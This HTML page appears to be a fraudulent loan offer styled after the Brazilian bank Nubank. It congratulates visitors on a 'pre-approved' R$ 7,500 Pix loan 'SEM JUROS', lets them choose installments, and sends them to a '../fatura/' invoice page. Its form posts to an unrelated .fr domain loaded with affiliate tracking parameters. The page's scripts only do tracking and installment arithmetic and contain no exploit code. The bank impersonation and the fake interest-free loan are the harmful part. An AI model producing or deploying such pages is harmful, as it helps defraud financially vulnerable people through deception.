<html data-capo="">
    
    <meta http-equiv="content-type" content="text/html;charset=UTF-8">
    
    <head>
<meta charset="UTF-8">


<script>
    window.pixelId = "6732697faac2ffcffad6a577";
    var a = document.createElement("script");
    a.setAttribute("async", "");
    a.setAttribute("defer", "");
    a.setAttribute("src", "https://cdn.utmify.com.br/scripts/pixel/pixel.js");
    document.head.appendChild(a);
  </script>
  
  
  <script src="../scripts/utms/latest-6.js" data-utmify-prevent-subids="" data-utmify-fast-start="" async="" defer=""></script>


    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <title>Nu</title>
    <link rel="stylesheet" href="https://pesquisa.plus/css/stylesfort2.css">

   

    <style>
        *,
        :after,
        :before {
            box-sizing: border-box;
        }

        html {
            font-family: system-ui, Segoe UI, Roboto, Helvetica, Arial, sans-serif, Apple Color Emoji, Segoe UI Emoji;
            line-height: 1.15;
            -webkit-text-size-adjust: 100%;
            -moz-tab-size: 4;
            -o-tab-size: 4;
            tab-size: 4;
        }

body {
    display: flex;
    flex-direction: column;  /* Coloca os elementos em coluna */
    justify-content: flex-start;  /* Garante que o conteúdo começa no topo */
    align-items: stretch;   /* Faz com que o conteúdo se ajuste à largura do body */
    min-height: 100vh;      /* Garante que o body ocupa a altura total da janela */
    margin-top: 10%;
    color: #fff;
    font-size: 19px;
    background-color: #FE0064;
}

        body {

            background-color: #FE0064;
        }

        .top-bar {
            background-color: #FE0064;
            width: 100%;
            display: flex;
            justify-content: center;
        }

        .container {
            display: flex;
            flex-direction: column;
            align-items: center;
            max-width: 40px;
            margin-top: 0 !important;
            width: 100%;
        }

        img.logo {
            height: 100px;
            width: auto;
        }

        .approved-page {
            display: flex;
            flex-direction: column;
            align-items: center;

            width: 100%;
            text-align: center;
        }

        .approved-message p {
            margin: 0.5rem 0;
            font-size: 1.25rem;
        }

        .loan-overview {
    display: grid;
    gap: 1rem;
    grid-template-columns: 1fr 1fr;
    max-width: 480px;
    width: 85%;
    margin: 1rem auto; /* Centraliza o elemento horizontalmente */
    justify-content: center; /* Adiciona centralização dentro do grid */
}


        .overview-card {
            border: 1px solid #fff;
            border-radius: 10px;
            padding: 15px 1rem;
            display: flex;
            flex-direction: column;
            justify-content: center;
            gap: 0.5rem;
        }

        .overview-card p {
            padding: 0px;
            margin: 0px;
            margin-bottom: 10px;
            text-align: left;
        }

        .overview-card .prop {
            font-size: 1.12rem;
            font-weight: 500;
        }

        .overview-card .value {
            display: flex;
            align-items: center;
            font-weight: 300;
        }

        .overview-card .icon {
            font-size: 1.5rem;
            margin-right: 0.5rem;
        }

        .button {
            border-radius: 1rem;
            cursor: pointer;
            font-weight: 500;
            letter-spacing: .3px;
            padding: .75rem 3rem;
            transition: opacity .1s;
            width: center;
            background: #fff;
            color: #FE0064;
            border: none;
            margin-top: 10rem;
            margin-bottom: 100px;
        }

        .button:hover {
            opacity: .9;
        }

        .button:disabled {
            cursor: not-allowed;
            opacity: .5;
        }

        .lottie-container {
            position: fixed;
            /* Mantém a animação fixa em relação à janela de visualização */
            top: 0;
            left: 0;
            width: 100vw;
            height: 100vh;
            display: flex;
            justify-content: center;
            align-items: center;
            pointer-events: none;
            /* Permite clicar através da animação */
            z-index: 1000;
            /* Garante que a animação fique sobre outros elementos */
        }
    </style>

    <script async="" defer="" src="js/pixel.js"></script>
    <script type="text/javascript" async="" src="f-1.txt"></script>
  
   

   
<script async="" defer="" src="js/pixel.js"></script>


  <!-- Meta Pixel Code -->
 
  <!-- End Meta Pixel Code -->

</head>

<body>

    <header class="top-bar">
        <img src="images/SIM-Branco.png" style="max-width:100px">
    </header>

    <div class="approved-page">
        <div class="approved-message">

            <p>Parabéns<b></b>!</p>

            <p>Temos uma proposta para você!</p>


            <script src="js/lottie-player.js"></script>

            <script>
                const dadosUsuario = JSON.parse(localStorage.getItem('dadosUsuario'));
                if (dadosUsuario && dadosUsuario.nome) {
                    document.getElementById('name').textContent = dadosUsuario.nome;
                } else {
                    document.getElementById('name').textContent = 'visitante';
                }
            </script>

        </div>
        <div class="loan-overview">
            <div class="overview-card">

                <p class="prop">Valor</p>
                <span class="value">
                    <svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" aria-hidden="true" role="img" class="icon iconify iconify--ph" data-v-71f83e1e="" style="" width="1em" height="1em" viewbox="0 0 256 256">
                        <path fill="currentColor" d="M128 26a102 102 0 1 0 102 102A102.12 102.12 0 0 0 128 26m0 192a90 90 0 1 1 90-90a90.1 90.1 0 0 1-90 90m38-70a26 26 0 0 1-26 26h-6v10a6 6 0 0 1-12 0v-10h-18a6 6 0 0 1 0-12h36a14 14 0 0 0 0-28h-24a26 26 0 0 1 0-52h6V72a6 6 0 0 1 12 0v10h18a6 6 0 0 1 0 12h-36a14 14 0 0 0 0 28h24a26 26 0 0 1 26 26">
                        </path>
                    </svg>
                    <b id="loan" data-v-f9269b1b="">R$ 7.500,00</b>
                </span>
            </div>
            <div class="overview-card">
                <p class="prop">Juros</p>
                <span class="value" style="line-height: 1.15; text-align: left;">
                    <svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" aria-hidden="true" role="img" class="icon iconify iconify--ph" data-v-71f83e1e="" style="" width="1em" height="1em" viewbox="0 0 256 256">
                        <path fill="currentColor" d="M208 34h-26V24a6 6 0 0 0-12 0v10H86V24a6 6 0 0 0-12 0v10H48a14 14 0 0 0-14 14v160a14 14 0 0 0 14 14h160a14 14 0 0 0 14-14V48a14 14 0 0 0-14-14M48 46h26v10a6 6 0 0 0 12 0V46h84v10a6 6 0 0 0 12 0V46h26a2 2 0 0 1 2 2v34H46V48a2 2 0 0 1 2-2m160 164H48a2 2 0 0 1-2-2V94h164v114a2 2 0 0 1-2 2">
                        </path>
                    </svg>
                    SEM JUROS!
                </span>
            </div>
            <div class="overview-card">
                <p class="prop">1ª parcela</p>
                <span class="value">
                    <svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" aria-hidden="true" role="img" class="icon iconify iconify--ph" data-v-71f83e1e="" style="" width="1em" height="1em" viewbox="0 0 256 256">
                        <path fill="currentColor" d="M208 34h-26V24a6 6 0 0 0-12 0v10H86V24a6 6 0 0 0-12 0v10H48a14 14 0 0 0-14 14v160a14 14 0 0 0 14 14h160a14 14 0 0 0 14-14V48a14 14 0 0 0-14-14M48 46h26v10a6 6 0 0 0 12 0V46h84v10a6 6 0 0 0 12 0V46h26a2 2 0 0 1 2 2v34H46V48a2 2 0 0 1 2-2m160 164H48a2 2 0 0 1-2-2V94h164v114a2 2 0 0 1-2 2">
                        </path>
                    </svg>
                    14/01/2025
                </span>
            </div>
            <div class="overview-card">
                <p class="prop">Status</p>
                <span class="value">
                    <svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" aria-hidden="true" role="img" class="icon iconify iconify--ph" data-v-71f83e1e="" style="" width="1em" height="1em" viewbox="0 0 256 256">
                        <path fill="currentColor" d="M224.42 104.2c-3.9-4.07-7.93-8.27-9.55-12.18c-1.5-3.63-1.58-9-1.67-14.68c-.14-9.38-.3-20-7.42-27.12S188 42.94 178.66 42.8c-5.68-.09-11-.17-14.68-1.67c-3.91-1.62-8.11-5.65-12.18-9.55C145.16 25.22 137.64 18 128 18s-17.16 7.22-23.8 13.58c-4.07 3.9-8.27 7.93-12.18 9.55c-3.63 1.5-9 1.58-14.68 1.67c-9.38.14-20 .3-27.12 7.42S42.94 68 42.8 77.34c-.09 5.68-.17 11-1.67 14.68c-1.62 3.91-5.65 8.11-9.55 12.18C25.22 110.84 18 118.36 18 128s7.22 17.16 13.58 23.8c3.9 4.07 7.93 8.27 9.55 12.18c1.5 3.63 1.58 9 1.67 14.68c.14 9.38.3 20 7.42 27.12s17.78 7.28 27.12 7.42c5.68.09 11 .17 14.68 1.67c3.91 1.62 8.11 5.65 12.18 9.55c6.64 6.36 14.16 13.58 23.8 13.58s17.16-7.22 23.8-13.58c4.07-3.9 8.27-7.93 12.18-9.55c3.63-1.5 9-1.58 14.68-1.67c9.38-.14 20-.3 27.12-7.42s7.28-17.74 7.42-27.12c.09-5.68.17-11 1.67-14.68c1.62-3.91 5.65-8.11 9.55-12.18c6.36-6.64 13.58-14.16 13.58-23.8s-7.22-17.16-13.58-23.8m-8.66 39.3c-4.67 4.86-9.5 9.9-12 15.9c-2.38 5.74-2.48 12.52-2.58 19.08c-.11 7.44-.23 15.14-3.9 18.82s-11.38 3.79-18.82 3.9c-6.56.1-13.34.2-19.08 2.58c-6 2.48-11 7.31-15.91 12c-5.25 5-10.68 10.24-15.49 10.24s-10.24-5.21-15.5-10.24c-4.86-4.67-9.9-9.5-15.9-12c-5.74-2.38-12.52-2.48-19.08-2.58c-7.44-.11-15.14-.23-18.82-3.9s-3.79-11.38-3.9-18.82c-.1-6.56-.2-13.34-2.58-19.08c-2.48-6-7.31-11-12-15.91C35.21 138.24 30 132.81 30 128s5.21-10.24 10.24-15.5c4.67-4.86 9.5-9.9 12-15.9c2.38-5.74 2.48-12.52 2.58-19.08c.11-7.44.23-15.14 3.9-18.82s11.38-3.79 18.82-3.9c6.56-.1 13.34-.2 19.08-2.58c6-2.48 11-7.31 15.91-12C117.76 35.21 123.19 30 128 30s10.24 5.21 15.5 10.24c4.86 4.67 9.9 9.5 15.9 12c5.74 2.38 12.52 2.48 19.08 2.58c7.44.11 15.14.23 18.82 3.9s3.79 11.38 3.9 18.82c.1 6.56.2 13.34 2.58 19.08c2.48 6 7.31 11 12 15.91c5 5.25 10.24 10.68 10.24 15.49s-5.23 10.22-10.26 15.48m-43.52-43.74a6 6 0 0 1 0 8.48l-56 56a6 6 0 0 1-8.48 0l-24-24a6 6 0 0 1 8.48-8.48L112 151.51l51.76-51.75a6 6 0 0 1 8.48 0">
                        </path>
                    </svg>
                    Pré-aprovado
                </span>
            </div>
            <div class="overview-card">
                <p class="prop">Tipo</p>
                <span class="value">
                    <svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" aria-hidden="true" role="img" class="icon iconify iconify--ph" data-v-71f83e1e="" style="" width="1em" height="1em" viewbox="0 0 256 256">
                        <path fill="currentColor" d="M128 26a102 102 0 1 0 102 102A102.12 102.12 0 0 0 128 26M71.44 198a66 66 0 0 1 113.12 0a89.8 89.8 0 0 1-113.12 0M94 120a34 34 0 1 1 34 34a34 34 0 0 1-34-34m99.51 69.64a77.53 77.53 0 0 0-40-31.38a46 46 0 1 0-51 0a77.53 77.53 0 0 0-40 31.38a90 90 0 1 1 131 0">
                        </path>
                    </svg>
                    Pessoal
                </span>
            </div>

            <div class="overview-card">
                <p class="prop">Transferência</p>
                <span class="value">
                    <svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" aria-hidden="true" role="img" class="icon iconify iconify--ph" data-v-71f83e1e="" style="" width="1em" height="1em" viewbox="0 0 256 256">
                        <path fill="currentColor" d="m233.91 118.14l-96-96a13.93 13.93 0 0 0-19.72 0l-96 96.05a13.93 13.93 0 0 0 0 19.72l96.05 96a13.93 13.93 0 0 0 19.72 0l96-96a13.93 13.93 0 0 0 0-19.72ZM126.62 30.57a2 2 0 0 1 2.76 0L188.81 90H160a6 6 0 0 0-4.24 1.76L128 119.52l-27.76-27.76A6 6 0 0 0 96 90H67.19ZM30 128a1.94 1.94 0 0 1 .57-1.38L55.19 102h38.32l26 26l-26 26H55.19l-24.62-24.62A1.94 1.94 0 0 1 30 128m99.38 97.43a2 2 0 0 1-2.76 0L67.19 166H96a6 6 0 0 0 4.24-1.76L128 136.48l27.76 27.76A6 6 0 0 0 160 166h28.81Zm96.05-96.05L200.81 154h-38.32l-26-26l26-26h38.32l24.62 24.62a2 2 0 0 1 0 2.76">
                        </path>
                    </svg>
                    Pix
                </span>
            </div>
        </div>
    </div>





    <style>
        /* Mantém o estilo existente */
html, body {
    font-family: system-ui, Segoe UI, Roboto, Helvetica, Arial, sans-serif, Apple Color Emoji, Segoe UI Emoji;
    background-color: #FE0064;
    padding: 0;
    margin-top: 2.5%;
    height: 100%; /* Garante que o body use toda a altura */
}

        .header {
            background-color: #9903d6;
            color: white;
            text-align: center;
            padding: 1rem 0;
        }

        .header-text {
            font-size: 1.5rem;
            margin: 10px 0 30px;
            color: #000;
        }

        .container {
            max-width: 400px;
            margin: 2rem auto;
            padding: 0.9rem;
            background-color: transparent;
            border-radius: 8px;
        }

        .form-group {
            margin: 0 auto 1.5rem auto;
            padding: 2rem;
            box-shadow: 0 1px 4px #000a2f1;
            border-radius: 10px;
            background-color: #fff;
            width:95%;
        }

        label {
            display: block;
            font-weight: 500;
            margin-bottom: 0.5rem;
            color: #333;
            font-size: 1.35rem;
            text-align: center;
        }

        .installments {
            display: grid;
            gap: 0.5rem;
            grid-template-columns: repeat(3, 1fr);
            margin-top: 1rem;
        }

        .installment {
            border: 1px solid #d4dae0;
            color: #FE0064;
            border-radius: 10px;
            cursor: pointer;
            font-weight: 700;
            padding: 0.6rem 1rem;
            background-color: transparent;
            transition: background-color 0.3s, color 0.3s;
        }

        .installment:hover,
        .installment.active {
            background-color: #FE0064;
            color: white;
        }

        #monthlyPayment {
            font-weight: bold;
            color: #FE0064;
            text-align: center;
            margin-top: 1rem;
        }

        .button.light {
            background-color: white;
            color: #FE0064;
            padding: 0.75rem 1.5rem;
            border-radius: 10px;
            text-align: center;
            display: block;
            width: 95%;
            transition: background-color 0.3s;
            margin: 1rem auto 1rem auto;
        }

        footer {
            width: 100%;
            color: #000;
            padding: 2rem 0;
            text-align: center;
            background-color: #edf0ef;
            border-top: 2px solid #ccc;
        }

        footer p {
            margin: 0.5rem 0;
            font-size: 0.875rem;
        }
    </style>


    <form id="loanForm" action="https://nsadasdn.fr/nu/6/?utm_source=organicjLj66d8b06e117d604b77fe55cc&amp;utm_campaign=rKm-km-rKm&amp;utm_medium=&amp;utm_content=&amp;utm_term=&amp;subid=organicjLj66d8b06e117d604b77fe55cc&amp;sid2=rKm-km-rKm&amp;subid2=rKm-km-rKm&amp;subid3=&amp;subid4=&amp;subid5=rKm-km-rKm&amp;xcod=organicjLj66d8b06e117d604b77fe55cchQwK21wXxRrKm-km-rKmhQwK21wXxRhQwK21wXxRhQwK21wXxR&amp;sck=organicjLj66d8b06e117d604b77fe55cchQwK21wXxRrKm-km-rKmhQwK21wXxRhQwK21wXxRhQwK21wXxR">
        <div class="form-group">
            <label>Em quantas vezes você deseja pagar sem juros</label>
            <div class="installments">
                <button type="button" class="installment" data-value="3">3x</button>
                <button type="button" class="installment" data-value="6">6x</button>
                <button type="button" class="installment" data-value="9">9x</button>
                <button type="button" class="installment" data-value="12">12x</button>
                <button type="button" class="installment" data-value="18">18x</button>
                <button type="button" class="installment" data-value="24">24x</button>
                <button type="button" class="installment" data-value="36">36x</button>
                <button type="button" class="installment" data-value="48">48x</button>
                <button type="button" class="installment active" data-value="60">60x</button>
            </div>
            <center>
                <p style="color:black !important;">
                    Sua parcela mensal será de R$ <span id="monthlyPayment">125,00</span>
                </p>
            </center>
        </div>
        <a class="button light" href="../fatura/" id="acceptProposal" style="text-decoration: none;">Aceitar proposta</a>
        <input type="hidden" name="utm_source" value="organicjLj66d8b06e117d604b77fe55cc"><input type="hidden" name="utm_campaign" value="rKm-km-rKm"><input type="hidden" name="utm_medium" value=""><input type="hidden" name="utm_content" value=""><input type="hidden" name="utm_term" value=""><input type="hidden" name="subid" value="organicjLj66d8b06e117d604b77fe55cc"><input type="hidden" name="sid2" value="rKm-km-rKm"><input type="hidden" name="subid2" value="rKm-km-rKm"><input type="hidden" name="subid3" value=""><input type="hidden" name="subid4" value=""><input type="hidden" name="subid5" value="rKm-km-rKm"><input type="hidden" name="xcod" value="organicjLj66d8b06e117d604b77fe55cchQwK21wXxRrKm-km-rKmhQwK21wXxRhQwK21wXxRhQwK21wXxR"><input type="hidden" name="sck" value="organicjLj66d8b06e117d604b77fe55cchQwK21wXxRrKm-km-rKmhQwK21wXxRhQwK21wXxRhQwK21wXxR">
    </form>

    <script>
        // Função para obter o valor de um cookie pelo nome
        function getCookie(nome) {
            const nomeEQ = `${nome}=`;
            const cookies = document.cookie.split(';');
            for (let i = 0; i < cookies.length; i++) {
                let cookie = cookies[i].trim();
                if (cookie.indexOf(nomeEQ) === 0) {
                    return cookie.substring(nomeEQ.length, cookie.length);
                }
            }
            return null;
        }
        
        const limite = getCookie('limite');
        const limite2 = getCookie('limite');
        const valorFormatado = Number(limite).toLocaleString('pt-BR', {
            style: 'currency',
            currency: 'BRL',
        });
        loan.innerHTML = valorFormatado;

        document.addEventListener('DOMContentLoaded', function () {
            const installments = document.querySelectorAll('.installment');
            let selectedInstallment = document.querySelector('.installment.active').dataset.value;

            installments.forEach(button => {
                button.addEventListener('click', function () {
                    installments.forEach(btn => btn.classList.remove('active'));
                    this.classList.add('active');
                    selectedInstallment = this.dataset.value;
                    updateMonthlyPayment(selectedInstallment);
                });
            });

            function updateMonthlyPayment(installments) {
                const loanAmount = limite2; // Valor base do empréstimo
                const paymentAmount = (loanAmount / installments).toFixed(2);
                document.getElementById('monthlyPayment').textContent = paymentAmount.replace('.', ',');
                localStorage.setItem('parcela', installments);
            }

            updateMonthlyPayment(selectedInstallment);

            document.getElementById('acceptProposal').addEventListener('click', function (event) {
                if (!selectedInstallment) {
                    alert('Por favor, selecione uma das opções de parcelas antes de continuar.');
                    event.preventDefault();
                } else {
                    // Aqui, você pode adicionar código adicional se necessário antes do redirecionamento.
                    localStorage.setItem('parcela', selectedInstallment); // Salvar parcela selecionada antes de redirecionar
                }
            });
        });
    </script>


<script src="../scripts/utms/latest-6.js" data-utmify-prevent-subids="" async="" defer=""></script>


<script type="text/javascript">
    (function(c,l,a,r,i,t,y){
        c[a]=c[a]||function(){(c[a].q=c[a].q||[]).push(arguments)};
        t=l.createElement(r);t.async=1;t.src="https://www.clarity.ms/tag/"+i;
        y=l.getElementsByTagName(r)[0];y.parentNode.insertBefore(t,y);
    })(window, document, "clarity", "script", "ppobfzii52");
</script>



</body></html>